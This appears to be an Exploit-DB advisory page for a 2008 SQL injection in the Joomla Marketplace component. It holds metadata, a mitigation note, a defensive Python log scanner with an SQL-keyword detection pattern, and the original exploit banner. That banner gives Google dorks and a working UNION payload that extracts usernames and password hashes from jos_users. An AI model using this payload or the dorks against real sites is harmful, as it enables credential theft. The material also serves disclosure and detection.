Vendor: Marketplace
By: SoSo H H (Iraqi-Cracker)
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Marketplace
Affected Version From: 1.1.2001
Affected Version To: 1.1.1-pl1
Patch Exists: YES
Related CWE: N/A
CPE: a:joomla:marketplace:1.1.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2008

Joomla Component Markplace 1.1.1 Remote Sql Injection Exploit

This is a remote SQL injection in the Joomla component com_marketplace: the 'catid' parameter of the show_category page ('index.php?option=com_marketplace&page=show_category&catid=(SQL)') is placed into a database query without validation, so an attacker can append their own SQL. The author's example payload, '-1+union+select+concat(username,0x3a,password),2,3+from+jos_users/*', uses a UNION to return the username and password columns of the jos_users table in the page output.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.
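As an added example (not part of this advisory or the exploit author's code), the Python script below applies the check the mitigation describes to web-server access logs: a category id is only ever a positive integer, so any other catid value on the show_category page is either malformed or an injection attempt. The log lines, IP addresses and timestamps are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined-style); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [03/Feb/2008:10:00:01 +0000] "GET /index.php?option=com_marketplace&page=show_category&catid=12 HTTP/1.1" 200 5120
203.0.113.9 - - [03/Feb/2008:10:00:07 +0000] "GET /index.php?option=com_marketplace&page=show_category&catid=-1+union+select+concat(username,0x3a,password),2,3+from+jos_users/* HTTP/1.1" 200 4098
203.0.113.9 - - [03/Feb/2008:10:00:09 +0000] "GET /index.php?option=com_marketplace&page=show_category&catid=7%27 HTTP/1.1" 500 312
203.0.113.9 - - [03/Feb/2008:10:00:11 +0000] "GET /index.php?option=com_marketplace&page=show_category&catid=abc HTTP/1.1" 200 4098
198.51.100.2 - - [03/Feb/2008:10:01:00 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 8000
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# SQL keywords, comment openers and a stray quote have no business in a category id.
SQLI_MARKERS = re.compile(r"\b(union|select|from)\b|/\*|--|'", re.IGNORECASE)

def is_valid_catid(value: str) -> bool:
    """Mitigation check: catid is a category id, so only a bare positive integer is acceptable."""
    return value.isdigit() and int(value) > 0

def classify_request(path: str):
    """Return None for requests not touching the vulnerable page, else (catid, verdict)."""
    parts = urlsplit(path)
    qs = parse_qs(parts.query, keep_blank_values=True)  # decodes %27 and '+' for us
    if qs.get("option") != ["com_marketplace"] or qs.get("page") != ["show_category"]:
        return None
    catid = qs.get("catid", [""])[0]
    if is_valid_catid(catid):
        return catid, "ok"
    verdict = "sqli-attempt" if SQLI_MARKERS.search(catid) else "malformed"
    return catid, verdict

def scan_log(text: str):
    """Return (ip, status, catid, verdict) for every hit on the show_category page."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        result = classify_request(m["path"])
        if result is None:
            continue
        catid, verdict = result
        findings.append((m["ip"], int(m["status"]), catid, verdict))
    return findings

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```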

Exploit-DB raw data:

############################################################################
# Joomla Component Markplace 1.1.1 Remote Sql Injection Exploit            #
#                                                                          #
# AUTHOR:SoSo H H (Iraqi-Cracker)                                          #
#                                                                          #
# Tested on: Markplace Version 1.1.1 and 1.1.1-pl1                         #
#                                                                          #
# Dork:"Marketplace Version 1.1.1"                                         #
#      "Marketplace Version 1.1.1-pl1"                                     #
#      inurl:index.php?option=com_marketplace                              #
############################################################################
# Exploit in:                                                              #
# index.php?option=com_marketplace&page=show_category&catid=(SQL)          #
#                                                                          #
# Example:                                                                 #
#                                                                          #
# (SQL)=-1+union+select+concat(username,0x3a,password),2,3+from+jos_users/*#
############################################################################
# Greetz:                                                                  #
# L!0N,El Mariachi,My Sweet,Shadow Administrator,TrYaG Team                #
# and All 7shasha Boards Members!                                          #
############################################################################

# milw0rm.com [2008-02-03]